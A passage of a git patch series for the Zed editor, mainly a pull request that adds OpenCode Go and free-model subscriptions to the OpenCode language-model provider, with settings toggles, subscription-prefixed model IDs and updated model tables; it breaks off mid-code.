.unwrap_or(&command_source); - - let command_element = - self.render_collapsible_command(header_group.clone(), false, command_content, cx); + let command_element = self.render_collapsible_command( + header_group.clone(), + false, + tool_call.label.clone(), + window, + cx, + ); let is_expanded = self.expanded_tool_calls.contains(&tool_call.id); @@ -6565,11 +6576,11 @@ impl ThreadView { }) .map(|this| { if is_terminal_tool { - let label_source = tool_call.label.read(cx).source(); this.child(self.render_collapsible_command( card_header_id.clone(), true, - label_source, + tool_call.label.clone(), + window, cx, )) } else { diff --git a/crates/markdown/src/markdown.rs b/crates/markdown/src/markdown.rs index 2fd0eb692d0c55..dce9633c87b050 100644 --- a/crates/markdown/src/markdown.rs +++ b/crates/markdown/src/markdown.rs @@ -297,6 +297,15 @@ impl MarkdownStyle { } } + pub fn with_buffer_font(mut self, cx: &App) -> Self { + let theme_settings = ThemeSettings::get_global(cx); + self.base_text_style.font_family = theme_settings.buffer_font.family.clone(); + self.base_text_style.font_fallbacks = theme_settings.buffer_font.fallbacks.clone(); + self.base_text_style.font_features = theme_settings.buffer_font.features.clone(); + self.base_text_style.font_weight = theme_settings.buffer_font.weight; + self + } + pub fn with_muted_text(mut self, cx: &App) -> Self { let colors = cx.theme().colors(); self.base_text_style.color = colors.text_muted; From 3eafe4c64dd05fdb460aea748b669fe8e941afbb Mon Sep 17 00:00:00 2001 From: Vlad Ionescu Date: Fri, 24 Apr 2026 17:17:30 +0300 Subject: [PATCH 019/231] opencode: Add support for OpenCode Go (#53651) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit **TL;DR**: add support for OpenCode Go (flat-rate monthly subscription) along the already-implemented OpenCode Zed (pay-as-you-go billing). > [!WARNING] > This code was written by LLMs, under the supervision of a so-called developer that never wrote Rust profesionally and that spends more time in Pages&Keynote than in an IDE. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable ## Background OpenCode offers a few different ways to access models: - **free access to 3 models**, with feedback and data used to improve the model. These models use the OpenCode Zen API endpoints, but have different usage limits (200 requests per 5 hours) and have a different privacy policy. Some people disable or block the free models, some people are super-excited to have access to LLMs for free, and some people like using the free models to test new LLMs (at launch MiMo-V2 had 2 free weeks of usage, for example). - **pay-as-you-go access to 30 models** as part of the [OpenCode Zen](https://opencode.ai/zen) subscription. These models use the same OpenCode Zen API endpoints. - **flat-rate monthly access to 7 models** as part of the [OpenCode Go](https://opencode.ai/go) subscription. These models use the OpenCode Zen API endpoints with an extra `/go` appended to the path. There are 5-hour, weekly, and monthly usage limits and, additionally, users can toggle a switch in the OpenCode Console to use Zen models with their pay-as-you-go billing after the Go limits are hit. There's also a currently-paused [OpenCode Black](https://opencode.ai/black) flat-rate subscription with way higher usage limits and with access to more models, with $100 and $200 monthly plans. The whole thing is a bit messy, but it's great value and highly reliable LLM access!
https://github.com/zed-industries/zed/pull/49589 added support for OpenCode Zen by implementing a new `opencode` provider. OpenCode Go [could be used by overriding the API URL](https://github.com/zed-industries/zed/pull/49589#issuecomment-4130300454), but that is a terrible user experience: some models have to be manually added, the model list always shows the 30-something OpenCode Zen models, and free models cannot be used at all. I was annoyed by the experience of using OpenCode Go with Zed and this past week I had to test a bunch of LLMs and providers and harnesses, so I took this on as a test case 🙂 ## Implementation This PR makes the OpenCode provider more general (not just for Zen) and adds an `OpenCodeModelSubscription` concept which is then used to implement support for OpenCode Go. The free models are also broken out into their own subscription for a prettier model list. For a better user experience, the different subscriptions can be enabled or disabled, both in the settings file and in the UX: Screenshot showing the OpenCode
provider configuration, with the newly added toggles The code was written by LLMs, but I do understand it and I did a bunch of "manual" iterations and "manual" tweaks. Still, my Rust experience is non-existent so **I won't feel offended if y'all reject this PR**! I did consider alternatives (adding a new `opencode-go` provider and renaming this to `opencode-zen`, for example, or adding support for custom API URLs in OpenCode custom models which would've been the smallest code change but a terrible user experience, and so on) but all alternatives would have been, in my opinion, a worse user experience. **Tests I did**: - confirmed OpenCode Go models work as expected - confirmed OpenCode Zen Free models work as expected - confirmed I get an error when trying to use OpenCode Zen models since I don't have that subscription - confirmed the subcription toggles work as expected (model are shown/hidden, settings file is updated) **Notes**: - this PR is best reviewed commit-by-commit. I did not create a separate PR for the model updates to minimize delays - my exeprience with Rust is roughly zero, but I tried to strike a balance between idiomatic Rust and easy-to-read code - users of the OpenCode provider might have to do some re-configuration after this PR is merged since the model identifiers now include the subscription, eg `claude-haiku-4-5` is now `zen/claude-haiku-4-5`. Since this is a relatively new provider and the impact is small, I preffered that rather than adding complex migration/mapping logic. - does changing the provider name from "OpenCode Zen" to "OpenCode" break anything for y'all at Zed? - does changing the telemetry id from `"opencode/"` to `"opencode//"` break anything for y'all at Zed? --- Release Notes: - OpenCode provider: add support for OpenCode Go --------- Co-authored-by: Ben Brandt --- .../language_models/src/provider/opencode.rs | 316 +++++++++++++++--- crates/language_models/src/settings.rs | 3 + crates/opencode/src/opencode.rs | 215 +++++++++--- crates/settings_content/src/language_model.rs | 18 + docs/src/ai/llm-providers.md | 69 ++++ 5 files changed, 521 insertions(+), 100 deletions(-) diff --git a/crates/language_models/src/provider/opencode.rs b/crates/language_models/src/provider/opencode.rs index 4b0f8e5992a22c..f8097b1798d863 100644 --- a/crates/language_models/src/provider/opencode.rs +++ b/crates/language_models/src/provider/opencode.rs @@ -1,21 +1,25 @@ use anyhow::Result; use collections::BTreeMap; use credentials_provider::CredentialsProvider; +use fs::Fs; use futures::{FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; -use http_client::HttpClient; +use http_client::{AsyncBody, HttpClient, http}; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, LanguageModelToolChoice, RateLimiter, env_var, }; -use opencode::{ApiProtocol, OPENCODE_API_URL}; +use opencode::{ApiProtocol, OPENCODE_API_URL, OpenCodeSubscription}; pub use settings::OpenCodeAvailableModel as AvailableModel; -use settings::{Settings, SettingsStore}; +use settings::{Settings, SettingsStore, update_settings_file}; use std::sync::{Arc, LazyLock}; use strum::IntoEnumIterator; -use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; +use ui::{ + Banner, ButtonLink, ConfiguredApiCard, List, ListBulletItem, Severity, Switch, + SwitchLabelPosition, ToggleState, prelude::*, +}; use ui_input::InputField; use util::ResultExt; @@ -26,7 +30,7 @@ use crate::provider::open_ai::{ }; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("opencode"); -const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenCode Zen"); +const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenCode"); const API_KEY_ENV_VAR_NAME: &str = "OPENCODE_API_KEY"; static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); @@ -35,6 +39,9 @@ static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); pub struct OpenCodeSettings { pub api_url: String, pub available_models: Vec, + pub show_zen_models: bool, + pub show_go_models: bool, + pub show_free_models: bool, } pub struct OpenCodeLanguageModelProvider { @@ -104,10 +111,16 @@ impl OpenCodeLanguageModelProvider { Self { http_client, state } } - fn create_language_model(&self, model: opencode::Model) -> Arc { + fn create_language_model( + &self, + model: opencode::Model, + subscription: OpenCodeSubscription, + ) -> Arc { + let id_str = format!("{}/{}", subscription.id_prefix(), model.id()); Arc::new(OpenCodeLanguageModel { - id: LanguageModelId::from(model.id().to_string()), + id: LanguageModelId::from(id_str), model, + subscription, state: self.state.clone(), http_client: self.http_client.clone(), request_limiter: RateLimiter::new(4), @@ -118,6 +131,15 @@ impl OpenCodeLanguageModelProvider { &crate::AllLanguageModelSettings::get_global(cx).opencode } + fn subscription_enabled(subscription: OpenCodeSubscription, cx: &App) -> bool { + let settings = Self::settings(cx); + match subscription { + OpenCodeSubscription::Zen => settings.show_zen_models, + OpenCodeSubscription::Go => settings.show_go_models, + OpenCodeSubscription::Free => settings.show_free_models, + } + } + fn api_url(cx: &App) -> SharedString { let api_url = &Self::settings(cx).api_url; if api_url.is_empty() { @@ -149,24 +171,68 @@ impl LanguageModelProvider for OpenCodeLanguageModelProvider { IconOrSvg::Icon(IconName::AiOpenCode) } - fn default_model(&self, _cx: &App) -> Option> { - Some(self.create_language_model(opencode::Model::default())) + fn default_model(&self, cx: &App) -> Option> { + if Self::subscription_enabled(OpenCodeSubscription::Go, cx) { + // If both Go and Zen are enabled, prefer Go since it's not pay-as-you-go + Some( + self.create_language_model(opencode::Model::default_go(), OpenCodeSubscription::Go), + ) + } else if Self::subscription_enabled(OpenCodeSubscription::Zen, cx) { + Some(self.create_language_model(opencode::Model::default(), OpenCodeSubscription::Zen)) + } else if Self::subscription_enabled(OpenCodeSubscription::Free, cx) { + Some( + self.create_language_model( + opencode::Model::default_free(), + OpenCodeSubscription::Free, + ), + ) + } else { + None + } } - fn default_fast_model(&self, _cx: &App) -> Option> { - Some(self.create_language_model(opencode::Model::default_fast())) + fn default_fast_model(&self, cx: &App) -> Option> { + if Self::subscription_enabled(OpenCodeSubscription::Go, cx) { + // If both Go and Zen are enabled, prefer Go since it's not pay-as-you-go + Some(self.create_language_model( + opencode::Model::default_go_fast(), + OpenCodeSubscription::Go, + )) + } else if Self::subscription_enabled(OpenCodeSubscription::Zen, cx) { + Some( + self.create_language_model( + opencode::Model::default_fast(), + OpenCodeSubscription::Zen, + ), + ) + } else if Self::subscription_enabled(OpenCodeSubscription::Free, cx) { + Some(self.create_language_model( + opencode::Model::default_free_fast(), + OpenCodeSubscription::Free, + )) + } else { + None + } } fn provided_models(&self, cx: &App) -> Vec> { - let mut models = BTreeMap::default(); + let mut models: BTreeMap = + BTreeMap::default(); + let settings = Self::settings(cx); for model in opencode::Model::iter() { - if !matches!(model, opencode::Model::Custom { .. }) { - models.insert(model.id().to_string(), model); + if matches!(model, opencode::Model::Custom { .. }) { + continue; + } + for &subscription in model.available_subscriptions() { + if Self::subscription_enabled(subscription, cx) { + let key = format!("{}/{}", subscription.id_prefix(), model.id()); + models.insert(key, (model.clone(), subscription)); + } } } - for model in &Self::settings(cx).available_models { + for model in &settings.available_models { let protocol = match model.protocol.as_str() { "anthropic" => ApiProtocol::Anthropic, "openai_responses" => ApiProtocol::OpenAiResponses, @@ -174,21 +240,29 @@ impl LanguageModelProvider for OpenCodeLanguageModelProvider { "google" => ApiProtocol::Google, _ => ApiProtocol::OpenAiChat, // default fallback }; - models.insert( - model.name.clone(), - opencode::Model::Custom { - name: model.name.clone(), - display_name: model.display_name.clone(), - max_tokens: model.max_tokens, - max_output_tokens: model.max_output_tokens, - protocol, - }, - ); + let subscription = match model.subscription { + Some(settings::OpenCodeModelSubscription::Go) => OpenCodeSubscription::Go, + Some(settings::OpenCodeModelSubscription::Free) => OpenCodeSubscription::Free, + Some(settings::OpenCodeModelSubscription::Zen) | None => OpenCodeSubscription::Zen, + }; + if !Self::subscription_enabled(subscription, cx) { + continue; + } + let custom_model = opencode::Model::Custom { + name: model.name.clone(), + display_name: model.display_name.clone(), + max_tokens: model.max_tokens, + max_output_tokens: model.max_output_tokens, + protocol, + custom_model_api_url: model.custom_model_api_url.clone(), + }; + let key = format!("{}/{}", subscription.id_prefix(), model.name); + models.insert(key, (custom_model, subscription)); } models .into_values() - .map(|model| self.create_language_model(model)) + .map(|(model, subscription)| self.create_language_model(model, subscription)) .collect() } @@ -219,16 +293,56 @@ impl LanguageModelProvider for OpenCodeLanguageModelProvider { pub struct OpenCodeLanguageModel { id: LanguageModelId, model: opencode::Model, + subscription: OpenCodeSubscription, state: Entity, http_client: Arc, request_limiter: RateLimiter, } +struct InjectHeaderClient { + inner: Arc, + name: http::HeaderName, + value: http::HeaderValue, +} + +impl HttpClient for InjectHeaderClient { + fn user_agent(&self) -> Option<&http::HeaderValue> { + self.inner.user_agent() + } + fn proxy(&self) -> Option<&http_client::Url> { + self.inner.proxy() + } + fn send( + &self, + mut req: http::Request, + ) -> futures::future::BoxFuture<'static, anyhow::Result>> { + req.headers_mut() + .insert(self.name.clone(), self.value.clone()); + self.inner.send(req) + } +} + impl OpenCodeLanguageModel { - /// Returns the base API URL (e.g., "https://opencode.ai/zen"). fn base_api_url(&self, cx: &AsyncApp) -> SharedString { - self.state - .read_with(cx, |_, cx| OpenCodeLanguageModelProvider::api_url(cx)) + // Custom models can override the API URL + if let opencode::Model::Custom { + custom_model_api_url: Some(url), + .. + } = &self.model + { + if !url.is_empty() { + return url.clone().into(); + } + } + + // Combine base URL with subscription path suffix + let base = self + .state + .read_with(cx, |_, cx| OpenCodeLanguageModelProvider::api_url(cx)); + + let suffix = self.subscription.api_path_suffix(); + let base_str = base.as_ref().trim_end_matches('/'); + format!("{}{}", base_str, suffix).into() } fn api_key(&self, cx: &AsyncApp) -> Option> { @@ -241,6 +355,7 @@ impl OpenCodeLanguageModel { fn stream_anthropic( &self, request: anthropic::Request, + http_client: Arc, cx: &AsyncApp, ) -> BoxFuture< 'static, @@ -252,7 +367,6 @@ impl OpenCodeLanguageModel { LanguageModelCompletionError, >, > { - let http_client = self.http_client.clone(); // Anthropic crate appends /v1/messages to api_url let api_url = self.base_api_url(cx); let api_key = self.api_key(cx); @@ -280,12 +394,12 @@ impl OpenCodeLanguageModel { fn stream_openai_chat( &self, request: open_ai::Request, + http_client: Arc, cx: &AsyncApp, ) -> BoxFuture< 'static, Result>>, > { - let http_client = self.http_client.clone(); // OpenAI crate appends /chat/completions to api_url, so we pass base + "/v1" let base_url = self.base_api_url(cx); let api_url: SharedString = format!("{base_url}/v1").into(); @@ -315,12 +429,12 @@ impl OpenCodeLanguageModel { fn stream_openai_response( &self, request: open_ai::responses::Request, + http_client: Arc, cx: &AsyncApp, ) -> BoxFuture< 'static, Result>>, > { - let http_client = self.http_client.clone(); // Responses crate appends /responses to api_url, so we pass base + "/v1" let base_url = self.base_api_url(cx); let api_url: SharedString = format!("{base_url}/v1").into(); @@ -347,15 +461,15 @@ impl OpenCodeLanguageModel { async move { Ok(future.await?.boxed()) }.boxed() } - fn stream_google_zen( + fn stream_google( &self, request: google_ai::GenerateContentRequest, + http_client: Arc, cx: &AsyncApp, ) -> BoxFuture< 'static, Result>>, > { - let http_client = self.http_client.clone(); let api_url = self.base_api_url(cx); let api_key = self.api_key(cx); @@ -365,7 +479,7 @@ impl OpenCodeLanguageModel { provider: PROVIDER_NAME, }); }; - let request = opencode::stream_generate_content_zen( + let request = opencode::stream_generate_content( http_client.as_ref(), &api_url, &api_key, @@ -385,7 +499,11 @@ impl LanguageModel for OpenCodeLanguageModel { } fn name(&self) -> LanguageModelName { - LanguageModelName::from(self.model.display_name().to_string()) + LanguageModelName::from(format!( + "{}: {}", + self.subscription.display_name(), + self.model.display_name() + )) } fn provider_id(&self) -> LanguageModelProviderId { @@ -409,13 +527,17 @@ impl LanguageModel for OpenCodeLanguageModel { LanguageModelToolChoice::Auto | LanguageModelToolChoice::Any => true, LanguageModelToolChoice::None => { // Google models don't support None tool choice - self.model.protocol() != ApiProtocol::Google + self.model.protocol(self.subscription) != ApiProtocol::Google } } } fn telemetry_id(&self) -> String { - format!("opencode/{}", self.model.id()) + format!( + "opencode/{}/{}", + self.subscription.id_prefix(), + self.model.id() + ) } fn max_token_count(&self) -> u64 { @@ -440,7 +562,19 @@ impl LanguageModel for OpenCodeLanguageModel { LanguageModelCompletionError, >, > { - match self.model.protocol() { + let http_client = if let Some(ref thread_id) = request.thread_id + && let Ok(value) = http::HeaderValue::from_str(thread_id) + { + Arc::new(InjectHeaderClient { + inner: self.http_client.clone(), + name: http::HeaderName::from_static("x-opencode-session"), + value, + }) + } else { + self.http_client.clone() + }; + + match self.model.protocol(self.subscription) { ApiProtocol::Anthropic => { let anthropic_request = into_anthropic( request, @@ -449,7 +583,7 @@ impl LanguageModel for OpenCodeLanguageModel { self.model.max_output_tokens().unwrap_or(8192), anthropic::AnthropicModelMode::Default, ); - let stream = self.stream_anthropic(anthropic_request, cx); + let stream = self.stream_anthropic(anthropic_request, http_client, cx); async move { let mapper = AnthropicEventMapper::new(); Ok(mapper.map_stream(stream.await?).boxed()) @@ -466,7 +600,7 @@ impl LanguageModel for OpenCodeLanguageModel { None, false, ); - let stream = self.stream_openai_chat(openai_request, cx); + let stream = self.stream_openai_chat(openai_request, http_client, cx); async move { let mapper = OpenAiEventMapper::new(); Ok(mapper.map_stream(stream.await?).boxed()) @@ -482,7 +616,7 @@ impl LanguageModel for OpenCodeLanguageModel { self.model.max_output_tokens(), None, ); - let stream = self.stream_openai_response(response_request, cx); + let stream = self.stream_openai_response(response_request, http_client, cx); async move { let mapper = OpenAiResponseEventMapper::new(); Ok(mapper.map_stream(stream.await?).boxed()) @@ -495,7 +629,7 @@ impl LanguageModel for OpenCodeLanguageModel { self.model.id().to_string(), google_ai::GoogleModelMode::Default, ); - let stream = self.stream_google_zen(google_request, cx); + let stream = self.stream_google(google_request, http_client, cx); async move { let mapper = GoogleEventMapper::new(); Ok(mapper.map_stream(stream.await?.boxed()).boxed()) @@ -575,6 +709,30 @@ impl ConfigurationView { .detach_and_log_err(cx); } + fn set_subscription_enabled( + &mut self, + subscription: OpenCodeSubscription, + is_enabled: bool, + _window: &mut Window, + cx: &mut Context, + ) { + let fs = ::global(cx); + + update_settings_file(fs, cx, move |settings, _| { + let opencode_settings = settings + .language_models + .get_or_insert_default() + .opencode + .get_or_insert_default(); + + match subscription { + OpenCodeSubscription::Zen => opencode_settings.show_zen_models = Some(is_enabled), + OpenCodeSubscription::Go => opencode_settings.show_go_models = Some(is_enabled), + OpenCodeSubscription::Free => opencode_settings.show_free_models = Some(is_enabled), + } + }); + } + fn should_render_editor(&self, cx: &mut Context) -> bool { !self.state.read(cx).is_authenticated() } @@ -598,7 +756,7 @@ impl Render for ConfigurationView { v_flex() .on_action(cx.listener(Self::save_api_key)) .child(Label::new( - "To use OpenCode Zen models in Zed, you need an API key:", + "To use OpenCode models in Zed, you need an API key:", )) .child( List::new() @@ -606,12 +764,12 @@ impl Render for ConfigurationView { ListBulletItem::new("") .child(Label::new("Sign in and get your key at")) .child(ButtonLink::new( - "OpenCode Zen Console", - "https://opencode.ai/zen", + "OpenCode Console", + "https://opencode.ai/auth", )), ) .child(ListBulletItem::new( - "Paste your API key below and hit enter to start using OpenCode Zen", + "Paste your API key below and hit enter to start using OpenCode", )), ) .child(self.api_key_editor.clone()) @@ -638,7 +796,69 @@ impl Render for ConfigurationView { if self.load_credentials_task.is_some() { div().child(Label::new("Loading credentials...")).into_any() } else { - v_flex().size_full().child(api_key_section).into_any() + let settings = OpenCodeLanguageModelProvider::settings(cx); + let show_zen = settings.show_zen_models; + let show_go = settings.show_go_models; + let show_free = settings.show_free_models; + + let subscription_toggles = v_flex() + .gap_1() + .child(Label::new("Subscriptions:").color(Color::Muted)) + .child( + Switch::new("opencode-show-zen-models", show_zen.into()) + .label("Show Zen models") + .label_position(SwitchLabelPosition::End) + .on_click(cx.listener(|this, state, window, cx| { + this.set_subscription_enabled( + OpenCodeSubscription::Zen, + matches!(state, ToggleState::Selected), + window, + cx, + ); + })), + ) + .child( + Switch::new("opencode-show-go-models", show_go.into()) + .label("Show Go models") + .label_position(SwitchLabelPosition::End) + .on_click(cx.listener(|this, state, window, cx| { + this.set_subscription_enabled( + OpenCodeSubscription::Go, + matches!(state, ToggleState::Selected), + window, + cx, + ); + })), + ) + .child( + Switch::new("opencode-show-free-models", show_free.into()) + .label("Show Free models") + .label_position(SwitchLabelPosition::End) + .on_click(cx.listener(|this, state, window, cx| { + this.set_subscription_enabled( + OpenCodeSubscription::Free, + matches!(state, ToggleState::Selected), + window, + cx, + ); + })), + ); + + let no_subscriptions_warning = if !show_zen && !show_go && !show_free { + Some(Banner::new().severity(Severity::Warning).child(Label::new( + "No subscriptions enabled. Enable at least one subscription to use OpenCode.", + ))) + } else { + None + }; + + v_flex() + .size_full() + .gap_2() + .child(api_key_section) + .child(subscription_toggles) + .children(no_subscriptions_warning) + .into_any() } } } diff --git a/crates/language_models/src/settings.rs b/crates/language_models/src/settings.rs index f60d4c6cb49851..a8d1b384d34623 100644 --- a/crates/language_models/src/settings.rs +++ b/crates/language_models/src/settings.rs @@ -91,6 +91,9 @@ impl settings::Settings for AllLanguageModelSettings { opencode: OpenCodeSettings { api_url: opencode.api_url.unwrap(), available_models: opencode.available_models.unwrap_or_default(), + show_zen_models: opencode.show_zen_models.unwrap_or(true), + show_go_models: opencode.show_go_models.unwrap_or(true), + show_free_models: opencode.show_free_models.unwrap_or(true), }, open_router: OpenRouterSettings { api_url: open_router.api_url.unwrap(), diff --git a/crates/opencode/src/opencode.rs b/crates/opencode/src/opencode.rs index 4a40d472bde94e..9278d81677b08f 100644 --- a/crates/opencode/src/opencode.rs +++ b/crates/opencode/src/opencode.rs @@ -17,6 +17,40 @@ pub enum ApiProtocol { Google, } +#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, Serialize, Deserialize)] +#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] +#[serde(rename_all = "snake_case")] +pub enum OpenCodeSubscription { + Zen, + Go, + Free, +} + +impl OpenCodeSubscription { + pub fn display_name(&self) -> &'static str { + match self { + Self::Zen => "Zen", + Self::Go => "Go", + Self::Free => "Free", + } + } + + pub fn id_prefix(&self) -> &'static str { + match self { + Self::Zen => "zen", + Self::Go => "go", + Self::Free => "free", + } + } + + pub fn api_path_suffix(&self) -> &'static str { + match self { + Self::Zen | Self::Free => "", + Self::Go => "/go", + } + } +} + #[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] #[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq, EnumIter)] pub enum Model { @@ -86,20 +120,26 @@ pub enum Model { MiniMaxM2_5Free, #[serde(rename = "glm-5")] Glm5, + #[serde(rename = "glm-5.1")] + Glm5_1, #[serde(rename = "kimi-k2.5")] KimiK2_5, - #[serde(rename = "mimo-v2-pro-free")] - MimoV2ProFree, - #[serde(rename = "mimo-v2-omni-free")] - MimoV2OmniFree, - #[serde(rename = "mimo-v2-flash-free")] - MimoV2FlashFree, - #[serde(rename = "trinity-large-preview-free")] - TrinityLargePreviewFree, + #[serde(rename = "kimi-k2.6")] + KimiK2_6, + #[serde(rename = "minimax-m2.7")] + MiniMaxM2_7, + #[serde(rename = "mimo-v2-pro")] + MimoV2Pro, + #[serde(rename = "mimo-v2-omni")] + MimoV2Omni, #[serde(rename = "big-pickle")] BigPickle, #[serde(rename = "nemotron-3-super-free")] Nemotron3SuperFree, + #[serde(rename = "qwen3.5-plus")] + Qwen3_5Plus, + #[serde(rename = "qwen3.6-plus")] + Qwen3_6Plus, // -- Custom model -- #[serde(rename = "custom")] @@ -109,6 +149,7 @@ pub enum Model { max_tokens: u64, max_output_tokens: Option, protocol: ApiProtocol, + custom_model_api_url: Option, }, } @@ -117,6 +158,49 @@ impl Model { Self::ClaudeHaiku4_5 } + pub fn default_go() -> Self { + Self::KimiK2_5 + } + + pub fn default_go_fast() -> Self { + Self::MiniMaxM2_5 + } + + pub fn default_free() -> Self { + Self::BigPickle + } + + pub fn default_free_fast() -> Self { + Self::MiniMaxM2_5Free + } + + pub fn available_subscriptions(&self) -> &'static [OpenCodeSubscription] { + match self { + // Models available in both Zen and Go + Self::Glm5 + | Self::Glm5_1 + | Self::KimiK2_6 + | Self::KimiK2_5 + | Self::MiniMaxM2_5 + | Self::Qwen3_5Plus + | Self::Qwen3_6Plus => &[OpenCodeSubscription::Zen, OpenCodeSubscription::Go], + + // Go-only models + Self::MiniMaxM2_7 | Self::MimoV2Pro | Self::MimoV2Omni => &[OpenCodeSubscription::Go], + + // Free models + Self::MiniMaxM2_5Free | Self::Nemotron3SuperFree | Self::BigPickle => { + &[OpenCodeSubscription::Free] + } + + // Custom models get their subscription from settings, not from here + Self::Custom { .. } => &[], + + // All other built-in models are Zen-only + _ => &[OpenCodeSubscription::Zen], + } + } + pub fn id(&self) -> &str { match self { Self::ClaudeOpus4_7 => "claude-opus-4-7", @@ -151,11 +235,14 @@ impl Model { Self::MiniMaxM2_5 => "minimax-m2.5", Self::MiniMaxM2_5Free => "minimax-m2.5-free", Self::Glm5 => "glm-5", + Self::Glm5_1 => "glm-5.1", Self::KimiK2_5 => "kimi-k2.5", - Self::MimoV2ProFree => "mimo-v2-pro-free", - Self::MimoV2OmniFree => "mimo-v2-omni-free", - Self::MimoV2FlashFree => "mimo-v2-flash-free", - Self::TrinityLargePreviewFree => "trinity-large-preview-free", + Self::KimiK2_6 => "kimi-k2.6", + Self::MiniMaxM2_7 => "minimax-m2.7", + Self::MimoV2Pro => "mimo-v2-pro", + Self::MimoV2Omni => "mimo-v2-omni", + Self::Qwen3_5Plus => "qwen3.5-plus", + Self::Qwen3_6Plus => "qwen3.6-plus", Self::BigPickle => "big-pickle", Self::Nemotron3SuperFree => "nemotron-3-super-free", @@ -197,11 +284,14 @@ impl Model { Self::MiniMaxM2_5 => "MiniMax M2.5", Self::MiniMaxM2_5Free => "MiniMax M2.5 Free", Self::Glm5 => "GLM 5", + Self::Glm5_1 => "GLM 5.1", Self::KimiK2_5 => "Kimi K2.5", - Self::MimoV2ProFree => "MiMo V2 Pro Free", - Self::MimoV2OmniFree => "MiMo V2 Omni Free", - Self::MimoV2FlashFree => "MiMo V2 Flash Free", - Self::TrinityLargePreviewFree => "Trinity Large Preview Free", + Self::KimiK2_6 => "Kimi K2.6", + Self::MiniMaxM2_7 => "MiniMax M2.7", + Self::MimoV2Pro => "MiMo V2 Pro", + Self::MimoV2Omni => "MiMo V2 Omni", + Self::Qwen3_5Plus => "Qwen3.5 Plus", + Self::Qwen3_6Plus => "Qwen3.6 Plus", Self::BigPickle => "Big Pickle", Self::Nemotron3SuperFree => "Nemotron 3 Super Free", @@ -211,8 +301,18 @@ impl Model { } } - pub fn protocol(&self) -> ApiProtocol { + pub fn protocol(&self, subscription: OpenCodeSubscription) -> ApiProtocol { match self { + // Models offered by OpenCode have the same configuration across subscriptions + // with one outlier: non-free MiniMax models + Self::MiniMaxM2_7 | Self::MiniMaxM2_5 => { + if subscription == OpenCodeSubscription::Zen { + ApiProtocol::OpenAiChat + } else { + ApiProtocol::Anthropic + } + } + Self::ClaudeOpus4_7 | Self::ClaudeOpus4_6 | Self::ClaudeOpus4_5 @@ -241,14 +341,15 @@ impl Model { Self::Gemini3_1Pro | Self::Gemini3Flash => ApiProtocol::Google, - Self::MiniMaxM2_5 - | Self::MiniMaxM2_5Free + Self::MiniMaxM2_5Free | Self::Glm5 + | Self::Glm5_1 | Self::KimiK2_5 - | Self::MimoV2ProFree - | Self::MimoV2OmniFree - | Self::MimoV2FlashFree - | Self::TrinityLargePreviewFree + | Self::KimiK2_6 + | Self::MimoV2Pro + | Self::MimoV2Omni + | Self::Qwen3_5Plus + | Self::Qwen3_6Plus | Self::BigPickle | Self::Nemotron3SuperFree => ApiProtocol::OpenAiChat, @@ -259,10 +360,12 @@ impl Model { pub fn max_token_count(&self) -> u64 { match self { // Anthropic models - Self::ClaudeOpus4_7 | Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6 => 1_000_000, - Self::ClaudeOpus4_5 | Self::ClaudeSonnet4_5 | Self::ClaudeSonnet4 => 200_000, + Self::ClaudeOpus4_7 => 1_000_000, + Self::ClaudeOpus4_6 | Self::ClaudeSonnet4_6 => 1_000_000, + Self::ClaudeSonnet4_5 => 1_000_000, + Self::ClaudeOpus4_5 | Self::ClaudeHaiku4_5 => 200_000, Self::ClaudeOpus4_1 => 200_000, - Self::ClaudeHaiku4_5 => 200_000, + Self::ClaudeSonnet4 => 1_000_000, Self::Claude3_5Haiku => 200_000, // OpenAI models @@ -281,14 +384,15 @@ impl Model { Self::Gemini3Flash => 1_048_576, // OpenAI-compatible models - Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => 196_608, - Self::Glm5 => 200_000, - Self::KimiK2_5 => 262_144, - Self::MimoV2ProFree => 1_048_576, - Self::MimoV2OmniFree | Self::MimoV2FlashFree => 262_144, - Self::TrinityLargePreviewFree => 131_072, + Self::MiniMaxM2_7 => 204_800, + Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => 204_800, + Self::Glm5 | Self::Glm5_1 => 204_800, + Self::KimiK2_6 | Self::KimiK2_5 => 262_144, + Self::MimoV2Pro => 1_048_576, + Self::MimoV2Omni => 262_144, + Self::Qwen3_5Plus | Self::Qwen3_6Plus => 262_144, Self::BigPickle => 200_000, - Self::Nemotron3SuperFree => 262_144, + Self::Nemotron3SuperFree => 204_800, Self::Custom { max_tokens, .. } => *max_tokens, } @@ -298,12 +402,12 @@ impl Model { match self { // Anthropic models Self::ClaudeOpus4_7 | Self::ClaudeOpus4_6 => Some(128_000), - Self::ClaudeSonnet4_6 => Some(64_000), Self::ClaudeOpus4_5 - | Self::ClaudeOpus4_1 + | Self::ClaudeSonnet4_6 | Self::ClaudeSonnet4_5 - | Self::ClaudeSonnet4 - | Self::ClaudeHaiku4_5 => Some(64_000), + | Self::ClaudeHaiku4_5 + | Self::ClaudeSonnet4 => Some(64_000), + Self::ClaudeOpus4_1 => Some(32_000), Self::Claude3_5Haiku => Some(8_192), // OpenAI models @@ -327,12 +431,14 @@ impl Model { Self::Gemini3_1Pro | Self::Gemini3Flash => 